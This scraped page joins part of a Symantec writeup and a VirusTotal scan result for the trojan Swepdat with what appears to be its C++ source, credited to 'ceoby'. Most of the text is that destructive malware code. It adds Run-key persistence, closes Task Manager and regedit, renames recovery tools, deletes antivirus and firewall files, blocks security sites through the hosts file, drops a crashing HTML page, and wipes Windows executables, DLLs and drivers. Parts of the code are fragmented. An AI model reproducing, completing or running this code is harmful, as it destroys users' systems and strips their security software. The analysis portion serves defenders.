Académique Documents
Professionnel Documents
Culture Documents
Swepdat
Risk Level 1: Very Low
Printer Friendly Page
SUMMARY
TECHNICAL DETAILS
REMOVAL
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System
(Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows
XP).
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe to
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_
C:\WINDOWS\regedit.exe to C:\WINDOWS\regedit.ex_
C:\WINDOWS\system32\Restorerstrui\rstrui.exe to
C:\WINDOWS\system32\Restorerstrui\rstrui.ex_
C:\WINDOWS\system32\wscui.cpl to C:\WINDOWS\system32\wscui.cp_
C:\WINDOWS\system32\wupdmgr.exe to C:\WINDOWS\system32\wupdagr.ex_
C:\WINDOWS\system32\taskmgr.exe to C:\WINDOWS\system32\taskdae.ex_
4. Attempts to delete the following security-related files from the specific program folder and all
subfolders:
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
C:\Program Files\McAfee.com\VSO\Dat\4615\*.*
C:\Program Files\McAfee.com\*.*
C:\Program Files\Norton AntiVirus\*.dll
C:\Program Files\Common Files\Symantec Shared\*.exe
C:\Program Files\Norton AntiVirus\*.ini
C:\Program Files\Norton AntiVirus\*.exe
C:\Program Files\Norton AntiVirus\*.inf
C:\Program Files\Zone Labs\ZoneAlarm\*.exe
C:\Program Files\Zone Labs\ZoneAlarm\*.zap
C:\Program Files\Zone Labs\ZoneAlarm\*.dll
C:\Program Files\Zone Labs\ZoneAlarm\repair\*.dll
C:\Program Files\Kaspersky Lab\AVP6\*.exe
C:\Program Files\Kaspersky Lab\AVP6\*.dll
5. Adds the following lines to the hosts file to block access to specific Web sites:
0.0.0.0 google.com
0.0.0.0 www.hotmail.com
0.0.0.0 www.microsoft.com
0.0.0.0 microsoft.com
0.0.0.0 macafee.com
0.0.0.0 www.macafee.com
0.0.0.0 download.mcafee.com
0.0.0.0 www.download.mcafee.com
0.0.0.0 rads.mcafee.com
0.0.0.0 us.mcafee.com
0.0.0.0 www.networkassociates.com
0.0.0.0 networkassociates.com
0.0.0.0 update.symantec.com
0.0.0.0 updates.symantec.com
0.0.0.0 iveupdate.symantec.com
0.0.0.0 norton.com
0.0.0.0 www.symantec.com
0.0.0.0 symantec.com
0.0.0.0 www.norton.com
0.0.0.0 google.com
0.0.0.0 bitdefender.com
0.0.0.0 www.viruslist.com
0.0.0.0 viruslist.com
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com
0.0.0.0 www.kaspersky.com
0.0.0.0 kaspersky.com
0.0.0.0 kaspersky-labs.com
0.0.0.0 www.kaspersky-labs.com
0.0.0.0 www.trendmicro.com
0.0.0.0 trendmicro.com
0.0.0.0 www.pandasoftware.com
0.0.0.0 pandasoftware.com
0.0.0.0 www.nod32.com
0.0.0.0 nod32.com
0.0.0.0 yahoo.com
0.0.0.0 mail.yahoo.com
0.0.0.0 www.grisoft.com
0.0.0.0 www.f-secure.com
0.0.0.0 f-secure.com
Title: Error
Message: Access Violation at address: 0050666F
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
8. Creates the file C:\windows\system32\exploit.html which is a malicious HTML file that causes a Denial
of Service if opened.
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
File 74014b1000255b1f306e0088a10738001789c1d3.EXE received on 2009.05.23 13:15:04 (UTC)
Antivirus Version Last Update Result
AhnLab-V3 5.0.0.2 2009.05.23 -
AntiVir 7.9.0.168 2009.05.23 TR/Qhost.EY
Antiy-AVL 2.0.3.1 2009.05.22 Trojan/Win32.Qhost
Authentium 5.1.2.4 2009.05.22 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.22 Win32:KillWin-S
AVG 8.5.0.339 2009.05.23 Generic.MAY
BitDefender 7.2 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
CAT-QuickHeal 10.00 2009.05.23 Trojan.Qhost.ey
ClamAV 0.94.1 2009.05.22 Trojan.Rorren
Comodo 1157 2009.05.08 TrojWare.Win32.Qhosts.EY
DrWeb 5.0.0.12182 2009.05.23 Trojan.KillFiles.472
eSafe 7.0.17.0 2009.05.21 Win32.Qhost.ey
eTrust-Vet 31.6.6519 2009.05.23 -
F-Prot 4.4.4.56 2009.05.22 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.23 Trojan.Win32.Qhost.ey
Fortinet 3.117.0.0 2009.05.23 W32/Qhost.EY!tr
GData 19 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
Ikarus T3.1.1.49.0 2009.05.23 Trojan.Win32.Qhost
K7AntiVirus 7.10.741 2009.05.21 Trojan.Win32.Qhost.ey
Kaspersky 7.0.0.125 2009.05.23 Trojan.Win32.Qhost.ey
McAfee 5623 2009.05.22 Zap-337
McAfee+Artemis 5623 2009.05.22 Zap-337
McAfee-GW-Edition 6.7.6 2009.05.23 Trojan.Qhost.EY
Microsoft 1.4701 2009.05.23 TrojanDropper:Win32/Logsnif
NOD32 4098 2009.05.22 Win32/Qhosts.EY
Norman 2009.05.22 W32/Qhost.BZ
nProtect 2009.1.8.0 2009.05.23 Trojan/W32.Qhost.12288.D
PCTools 4.4.2.0 2009.05.21 Trojan.Qhosts
Prevx 3.0 2009.05.23 -
Rising 21.30.52.00 2009.05.23 Trojan.Qhost.eq
Sophos 4.42.0 2009.05.23 Troj/Killfile-F
Sunbelt 3.2.1858.2 2009.05.23 Trojan.Swepdat
Symantec 1.4.4.12 2009.05.23 Trojan.Swepdat
TheHacker 6.3.4.3.331 2009.05.22 Trojan/Qhost.ey
TrendMicro 8.950.0.1092 2009.05.23 -
VBA32 3.12.10.5 2009.05.23 Trojan.Win32.Qhost.ey
ViRobot 2009.5.23.1749 2009.05.23 -
VirusBuster 4.6.5.0 2009.05.22 Trojan.Qhost.RW
Additional information
File size: 12288 bytes
MD5 : 35b259a4d83e4d59be351c396fd6b95a
SHA1 : e20d0a5f2600162b76a2c89e3a101ce7240fcff8
SHA256: 631cb88ed8edacc15ff90dea81ff661adc628d17919e6c138f6c867d5c46035b
W32.MaTriX@mm.cpp
/*
made by ceoby
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <mmsystem.h>
void hideprocess()
{
int i;
for(i = 1; i < 25; i++)
{
HWND program;
Sleep (100);
program = FindWindow(0, "Windows Task Manager");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
program = FindWindow(0, "Registry Editor");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
program = FindWindow(0, "System Configuration Utility");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
program = FindWindow(0, "Windows File Protection");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
char Wn[MAX_PATH];
char Mn[MAX_PATH];
SOCKET sock;
HWND Wnd;
char Buffer [1230];
int x,y;
int Hkey()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\WUpdates.exe");
CopyFile(pathtofile,system,FALSE);
HKEY hKey;
W32.MaTriX@mm.cpp
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "WUpdates",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
}
void fPaths()
{
GetSystemDirectory(Wn, sizeof(Wn));
GetModuleFileName(0, Mn, sizeof(Mn));
strcat(Wn, "\\WUpdates.exe");
}
void inst()
{
CopyFile(Mn,Wn,0);
CopyFile ("WUpdates.exe", "C:\\windows",TRUE);
CopyFile ("MicroSuck.exe", "C:\\windows\\system",TRUE);
CopyFile ("Svchost32.exe", "C:\\windows\\system32",TRUE);
HKEY inst;
RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &inst);
RegSetValueEx(inst, "Windows Security Updates", 0, REG_SZ, (LPBYTE)Wn, sizeof(Wn));
RegCloseKey(inst);
}
void BlockSite()
{
FILE *fpl;
fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w");
fprintf (fpl,"0.0.0.0 google.com");
fprintf (fpl," 0.0.0.0 www.hotmail.com");
fprintf (fpl," 0.0.0.0 www.microsoft.com");
fprintf (fpl," 0.0.0.0 microsoft.com");
fprintf (fpl," 0.0.0.0 macafee.com");
fprintf (fpl," 0.0.0.0 www.macafee.com");
fprintf (fpl," 0.0.0.0 download.mcafee.com");
fprintf (fpl," 0.0.0.0 www.download.mcafee.com");
fprintf (fpl," 0.0.0.0 rads.mcafee.com");
fprintf (fpl," 0.0.0.0 us.mcafee.com");
fprintf (fpl," 0.0.0.0 www.networkassociates.com");
fprintf (fpl," 0.0.0.0 networkassociates.com");
fprintf (fpl," 0.0.0.0 update.symantec.com");
fprintf (fpl," 0.0.0.0 updates.symantec.com");
fprintf (fpl," 0.0.0.0 iveupdate.symantec.com");
fprintf (fpl," 0.0.0.0 norton.com");
fprintf (fpl," 0.0.0.0 www.symantec.com");
fprintf (fpl," 0.0.0.0 symantec.com");
fprintf (fpl," 0.0.0.0 www.norton.com");
fprintf (fpl," 0.0.0.0 google.com");
fprintf (fpl," 0.0.0.0 bitdefender.com");
fprintf (fpl," 0.0.0.0 www.viruslist.com");
fprintf (fpl," 0.0.0.0 viruslist.com");
fprintf (fpl," 0.0.0.0 www.virustotal.com");
fprintf (fpl," 0.0.0.0 virustotal.com");
fprintf (fpl," 0.0.0.0 www.kaspersky.com");
fprintf (fpl," 0.0.0.0 kaspersky.com");
fprintf (fpl," 0.0.0.0 kaspersky-labs.com");
fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com");
W32.MaTriX@mm.cpp
void DelWin()
{
system("del C:\\WINDOWS\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\System\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System32\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\System32\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System32\\Restore\\*.* /F /S /Q");
system("del C:\\WINDOWS\\System32\\DRIVERS\\*.sys /F /S /Q");
}
void spaceup()
{
char i;
FILE *Uknown;
Uknown = fopen ("C:\\WINDOWS\\System32\\WUpdates.txt","w");
for (i=1;i<100;i++);
{
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x00C0000,Bx0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x00000F0,0x0000000,7x0000000,0x00FF000,Ax0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x000E000,0x0000000");
fprintf(Uknown,"0x0000000,0D0000000,Bx0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Nx0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"Ax0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax000F000,0x00CCC00,0x0000C00,0xFFF0000");
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"3x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
}
}
void Exploit()
{
FILE *ghp;
ghp = fopen ("C:\\windows\\system32\\exploit.html","w");
fprintf(ghp, "<html>");
W32.MaTriX@mm.cpp
fprintf(ghp, "<script>");
fprintf(ghp, "window.onerror=new Function(history.go(0));");
fprintf(ghp, "function btf(){btf();}");
fprintf(ghp, "btf();");
fprintf(ghp, "</script>");
fprintf(ghp, "</html>");
}
void Anticlean()
{
int i;
for(i = 1; i < 9999999; i++)
rename("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe",
"C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.ex_");
Sleep (100);
rename("C:\\WINDOWS\\regedit.exe","C:\\WINDOWS\\regedit.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.exe",
"C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\wscui.cpl","C:\\WINDOWS\\system32\\wscui.cp_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\wupdmgr.exe","C:\\WINDOWS\\system32\\wupdagr.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\taskmgr.exe","C:\\WINDOWS\\system32\\taskdae.ex_");
Sleep (100);
MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );
}
void killavfw()
{
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q");
system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q ");
}
wndstealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(wndstealth,0);
Hkey();
Anticlean();
killavfw();
BlockSite();
hideprocess();
Exploit();
DelWin();
FILE *fp;
fp = fopen ("c:\\NError.dmp","w");
{
fprintf(fp,"%s","Stop: 0x0000000A (0xFFFFFFFC,0x00000002,0x00000000,0x804DC42A)");
fclose(fp);
}
}